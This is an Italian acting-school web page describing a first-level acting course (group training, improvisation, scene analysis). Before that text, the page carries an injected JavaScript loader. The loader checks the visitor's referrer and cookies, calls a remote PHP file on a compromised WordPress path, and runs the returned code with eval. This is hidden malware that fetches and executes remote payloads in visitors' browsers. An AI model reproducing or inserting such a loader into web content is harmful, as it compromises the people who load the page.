;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//accademiadeifilodrammatici.it/restyling/wp-admin/css/css.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

RECITAZIONE I FASE

 

DOCENTE: TOMMASO AMADIO

 


L’obiettivo del corso è quello di fornire all’allievo strumenti di lavoro, individuali e di gruppo, che permettano una presenza attiva e organica rispetto ai compiti di scena.


 

La fase iniziale del corso è dedicata alla valorizzazione del gruppo come luogo ideale per l’esplorazione delle potenzialità dei singoli.

In questa fase l’allievo è incoraggiato a considerare i compagni come delle risorse e non come dei concorrenti.
Il coraggio della proposta e l’apertura ad accogliere gli stimoli offerti dal partner sulla scena sono fin dall’inizio il focus del lavoro.
Ogni lezione è preceduta da un training psico-fisico che ha la duplice valenza di preparare all’attività della giornata e sviluppare tecniche di interazione col partner, capacità di attenzione/consapevolezza e immaginazione.
Lo strumento di lavoro utilizzato durante il corso è quello dell’improvvisazione su temi e compiti dati.
Nella seconda fase si intende potenziare nell’allievo la capacità di analizzare la realtà che lo circonda, incoraggiandolo a porre la propria attenzione sui rapporti di causa-effetto ed azione-reazione.
Lo studio sulle improvvisazioni permetterà l’introduzione dei concetti di circostanze date ed evento, così da portare l’allievo a familiarizzare con i vincoli imposti successivamente dall’approccio al ruolo: circostanze, scopo, volontà, azione.

Nella terza fase il lavoro verrà effettuato su scene di uno o più autori, ponendo l’attenzione sull’individuazione della sequenza di eventi, dell’evento principale, della logica della scena, della natura del conflitto, dell’obiettivo cui tendere, dell’atmosfera, del senso di composizione.

 

 


 

< I CORSI